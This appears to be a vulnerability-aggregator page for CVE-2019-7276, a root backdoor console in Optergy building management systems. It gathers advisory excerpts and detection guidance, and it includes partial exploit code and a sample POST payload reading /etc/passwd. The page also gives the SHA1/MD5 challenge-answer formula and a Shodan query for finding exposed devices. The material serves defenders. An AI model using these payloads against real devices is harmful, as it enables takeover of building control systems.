CVE-2019-7276
published 2019-07-01CVE-2019-7276: Optergy Proton/Enterprise devices allow Remote Root Code Execution via a Backdoor Console.
PriorityP192critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
93.38%
99.8th percentile
Optergy Proton/Enterprise devices allow Remote Root Code Execution via a Backdoor Console.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| optergy | enterprise | <= 2.3.0a | — |
| optergy | proton | <= 2.3.0a | — |
Detection & IOCsextracted from sources · hover to see the quote
commandcommand=cat /etc/passwd&challenge={{challenge}}&answer={{ sha1(challenge) + md5(sha1(challenge)) }}↗
- →Detect unauthenticated GET requests to the backdoor challenge endpoint /tools/ajax/ConsoleResult.html?get, followed by a POST to the same path with 'command', 'challenge', and 'answer' parameters. ↗
- →The exploit answer parameter is computed as SHA1(challenge) concatenated with MD5(SHA1(challenge)). Detecting this specific two-step hash pattern in POST body parameters can identify exploitation attempts. ↗
- →Alert on HTTP requests containing the User-Agent string 'BB/BMS-251.4ev4h', which is hardcoded in the public exploit PoC. ↗
- →Monitor for HTTP responses with Content-Type application/json and body matching regex 'root:.*:0:0:' as an indicator of successful exploitation via the backdoor console. ↗
- →Shodan query 'html:"Optergy"' can be used to identify internet-exposed Optergy BMS devices potentially vulnerable to this CVE. ↗
- →Successful exploitation results in root command execution using sudo as user 'optergy'. Monitor for sudo usage by the 'optergy' OS user as a post-exploitation indicator. ↗
- ·The vulnerability affects Optergy Proton and Enterprise BMS versions 2.0.3a and below. Version 2.3.0a is also explicitly referenced in the public exploit. Ensure version scoping is applied when triaging alerts. ↗
- ·The backdoor console endpoint is undocumented and unauthenticated — no credentials are required to reach it, meaning perimeter authentication controls alone are insufficient to block exploitation. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-3hvf-c8rp-98pv: Optergy Proton/Enterprise devices allow Remote Root Code Execution via a Backdoor Console
ghsa_unreviewed·2022-05-24
CVE-2019-7276 [CRITICAL] GHSA-3hvf-c8rp-98pv: Optergy Proton/Enterprise devices allow Remote Root Code Execution via a Backdoor Console
Optergy Proton/Enterprise devices allow Remote Root Code Execution via a Backdoor Console.
VulnCheck
Optergy Proton/Enterprise Remote Root Code Execution
vulncheck·2019·CVSS 9.8
CVE-2019-7276 [CRITICAL] Optergy Proton/Enterprise Remote Root Code Execution
Optergy Proton/Enterprise Remote Root Code Execution
Optergy Proton/Enterprise devices allow Remote Root Code Execution via a Backdoor Console.
Affected: optergy enterprise
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://unit42.paloaltonetworks.com/iot-vulnerabilities-mirai-payloads/; https://app.crowdsec.net/cti/cve-explorer/CVE-2019-7276
CISA ICS
Optergy Proton Enterprise Building Management System
cisa_ics·2019-06-06·CVSS 5.3
[MEDIUM] Optergy Proton Enterprise Building Management System
## Archived Content In an effort to keep CISA.gov current, the archive contains outdated information that may not reflect current policy or programs.
ICS Advisory
##
Optergy Proton Enterprise Building Management System
Last RevisedJune 06, 2019
Alert CodeICSA-19-157-01
## 1. EXECUTIVE SUMMARY
-
CVSS v3 10.0
- ATTENTION: Exploitable remotely/low skill level to exploit
- Vendor: Optergy
- Equipment: Proton/Enterprise Building Management System
- Vulnerabilities: Information Exposure, Cross-site Request Forgery, Unrestricted Upload of File with Dangerous Type, Open Redirect, Hidden Functionality, Exposed Dangerous Method or Function, Use of Hard-coded Credentials
## 2. RISK EVALUATION
Successful exploitation of these vulnerabilities could
No detection rules found.
Exploit-DB
Optergy 2.3.0a - Remote Code Execution (Backdoor)
exploitdb·2019-11-12·CVSS 9.8
CVE-2019-7276 [CRITICAL] Optergy 2.3.0a - Remote Code Execution (Backdoor)
Optergy 2.3.0a - Remote Code Execution (Backdoor)
---
# Title: Optergy 2.3.0a - Remote Code Execution
# Author: LiquidWorm
# Date: 2019-11-05
# Vendor: https://optergy.com/
# Product web page: https://optergy.com/products/
# Affected version: \n'
sys.exit()
while True:
challenge_url = 'http://'+sys.argv[1]+'/tools/ajax/ConsoleResult.html?get'
try:
req1 = requests.get(challenge_url)
get_challenge = json.loads(req1.text)
challenge = get_challenge['response']['message']
print 'Challenge received: ' + challenge
hash_object = hashlib.sha1(challenge.encode())
print 'SHA1: '+(hash_object.hexdigest())
h1 = (hash_object.hexdigest())
hash_object = hashlib.md5(h1.encode())
print 'MD5 from SHA1: '+(hash_object.hexdigest())
h2 = (hash_object.hexdigest())
print 'Answer: '+h1+h2
zeTargets = 'http:
Nuclei
Optergy Proton/Enterprise - Unauthenticated RCE via Backdoor Console
nuclei·CVSS 9.8
CVE-2019-7276 [CRITICAL] Optergy Proton/Enterprise - Unauthenticated RCE via Backdoor Console
Optergy Proton/Enterprise - Unauthenticated RCE via Backdoor Console
Optergy Proton/Enterprise devices allow Remote Root Code Execution via a Backdoor Console.
Template:
id: CVE-2019-7276
info:
name: Optergy Proton/Enterprise - Unauthenticated RCE via Backdoor Console
author: daffainfo
severity: critical
description: |
Optergy Proton/Enterprise devices allow Remote Root Code Execution via a Backdoor Console.
impact: |
Unauthenticated attackers can exploit the backdoor console to execute arbitrary system commands with root privileges, leading to complete device compromise and control over building management systems.
remediation: |
Apply vendor-provided firmware updates or disable the affected console feature if possible.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-7276
- htt
Metasploit
Optergy Proton and Enterprise BMS Command Injection using a backdoor
metasploit
Optergy Proton and Enterprise BMS Command Injection using a backdoor
Optergy Proton and Enterprise BMS Command Injection using a backdoor
This module exploits an undocumented backdoor vulnerability in the Optergy Proton and Enterprise Building Management System (BMS) applications. Versions `2.0.3a` and below are vulnerable. Attackers can exploit this issue by directly navigating to an undocumented backdoor script called Console.jsp in the tools directory and gain full system access. Successful exploitation results in `root` command execution using `sudo` as user `optergy`.
Unit42
Two New IoT Vulnerabilities Identified with Mirai Payloads
blogs_unit42·2020-10-14
Two New IoT Vulnerabilities Identified with Mirai Payloads
Threat Research Center
Threat Research
Vulnerabilities
## Two New IoT Vulnerabilities Identified with Mirai Payloads
Ken Hsu
Yue Guan
Vaibhav Singhal
Qi Deng
Published: October 14, 2020
Threat Research
Vulnerabilities
IoT
Mirai
## Executive Summary
Palo Alto Networks is proactively trying to safeguard its customers from attacks however possible. By leveraging its Next-Generation Firewall as sensors on the perimeter to detect malicious payloads and attack patterns, Unit 42 researchers are able to hunt down the menaces out there on the network, be they known or not.
Unit 42 researchers have taken a closer look at four Mirai variants from two recently discovered campaigns leveraging command injection vulnerability exploits that reveal a familiar IoT attack pattern.
While t
Unit42
Two New IoT Vulnerabilities Identified with Mirai Payloads
blogs_unit42·2020-10-14
Two New IoT Vulnerabilities Identified with Mirai Payloads
## Executive Summary
Palo Alto Networks is proactively trying to safeguard its customers from attacks however possible. By leveraging its Next-Generation Firewall as sensors on the perimeter to detect malicious payloads and attack patterns, Unit 42 researchers are able to hunt down the menaces out there on the network, be they known or not.
Unit 42 researchers have taken a closer look at four Mirai variants from two recently discovered campaigns leveraging command injection vulnerability exploits that reveal a familiar IoT attack pattern.
While this generic approach allows researchers to observe the entire killchain and even acquire the malware binary from the attack, this post-exploitation heuristic does have its caveat: the traffic fingerprinting. Similar services yield similar traffi
http://packetstormsecurity.com/files/171564/Optergy-Proton-And-Enterprise-BMS-2.0.3a-Command-Injection.htmlhttp://www.securityfocus.com/bid/108686https://applied-risk.com/labs/advisorieshttps://www.applied-risk.com/resources/ar-2019-008http://packetstormsecurity.com/files/171564/Optergy-Proton-And-Enterprise-BMS-2.0.3a-Command-Injection.htmlhttp://www.securityfocus.com/bid/108686https://applied-risk.com/labs/advisorieshttps://www.applied-risk.com/resources/ar-2019-008
2019-07-01
Published
Exploited in the wild